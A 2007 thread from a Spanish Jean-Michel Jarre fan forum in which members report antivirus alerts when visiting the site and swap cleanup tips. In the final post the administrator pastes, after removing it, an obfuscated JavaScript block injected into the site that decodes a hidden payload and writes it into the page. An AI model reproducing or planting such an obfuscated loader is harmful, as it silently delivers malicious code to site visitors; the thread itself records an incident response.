Noticias:

Rendez-Vous 2016, Madrid!!! Toda la información aquí: http://www.jeanmicheljarre.es/foro/index.php?board=6.0

Main Menu

Virus en el foro?

Iniciado por SyntheticMan, 26 de Junio de 2007, 10:21:40 PM

« anterior - próximo »

SyntheticMan

En los últimos días, al entrar en el foro desde dos ordenadores distintos y en dos domicilios distintos, dos antivirus distintos (Norton y Kasperski) han detectado y anulado dos virus.

Os ha pasado a alguno más algo así?  :?

zopa

A mí, lo que me sale al poner la página principal, es "error en módulo" y me aparece dos veces... Además siempre tengo que meter mi nick y contraseña para ingresar en el Foro, cosa que no me pasaba antes...  :?
"Jarre?? Está bien... Te ríes..." (El Lobowolf)

everkindness

A mí también me pasa con el McAfee, que detecta un troyano, tanto con el Internet explorer como con el Mozilla Firefox. Esto sólo me pasa cuando me conecto a este foro, hasta ahora no me había pasado con ninguna otra página web.

Cronos

Navego con Opera, y no he tenido problemas.

ghostgoblins64

Yo entro siempre al índice del foro, no a través de la web y no tengo problemas.
En cualquier caso habría que revisar la portada del sitio para chequear que todo esté limpio y no se haya colado algún spyware.

De uso obligado es el programa SpywareBlaster, es simple y actua como inmunizador de cualquier componente malicioso que quiera instalarse sin permiso.

Wolworeta

Cita de: Cronoß en 27 de Junio de 2007, 03:04:14 AM
Navego con Opera, y no he tenido problemas.

Espero que sea con Madame Butterfly :-D

El virus es el Tío and Tía, seguro :evil:
Lo malo de la sociedad no es que sea manipulable, sino que no se deje manipular por mí.
Yo no amenazo, sólo te leo el futuro.
Siempre fuiste indigno de mi indignación.
Quien destruye sueños, consigue pesadillas.

QUIMGAGARIN

A mi se me abre el windows defender desde hace un par de dias.

Pinchos.doc

¿Por casualidad habeis ejecutado un control 'Active X' cuando accediais al foro?

...

También es posible que vuestro Internet Explorer esté infectado con un 'javascript' y cada vez que accedais a una dirección en favoritos o almacenada en la barra de direcciones se ejecute...

Borrar de vez en cuando los archivos temporales de internet...

SyntheticMan

ghostgoblins64

Cita de: Guillermo de Dhalgrencia.doc en 27 de Junio de 2007, 03:59:54 PM

También es posible que vuestro Internet Explorer esté infectado con un 'javascript' y cada vez que accedais a una dirección en favoritos o almacenada en la barra de direcciones se ejecute...

Borrar de vez en cuando los archivos temporales de internet...

Para quitar cualquier posible basurilla es bueno pasarle el CCleaner después de navegar por internet, además como buena medida de seguridad no conviene almacenar las contraseñas en el navegador si dejamos los archivos temporales sin borrar.

P.D : Es evidente que los que tienen este problema en el foro es por no visitar páginas decentes  :-D :-D :-D :-D

Mae

Igual es el sistema de estadísticas.

Luego lo desactivo a ver si es eso

Mae

He encontrado un código extraño. Lo he deshabilitado.

Probad ahora a ver.

Ñáñaro

Na, a mí me sigue saliendo el aviso de VirusScan.

Mae

Es que me acabo de cargar este cacoh de código:

<!-- o65 --><script language=JavaScript>function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,23,43,57,53,54,17,35,20,46,0,0,0,0,0,0,44,24,30,14,15,1,56,21,37,49,3,16,52,36,38,22,62,48,41,19,28,50,7,11,40,12,33,0,0,0,0,9,0,51,42,6,60,45,55,18,13,10,25,2,58,26,29,59,32,8,34,27,4,61,47,5,39,31,0);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("jUdQ1SYUz1X41sYNV5TL61uxibXUVVYfWCYHEJTUW9YQ62FUKyerO1erYvTQzfurGfT4VOXLYVTLh7_HGOFIiynQzyhNGOAaza@QhVhN8OjZOVhf_JYNVChaOadIYxYa6auxhaTQEJdUV9jNiUdQ1SYUzv_")</script><!-- c65 -->

Es raro, en teoría el código de la web está limpio...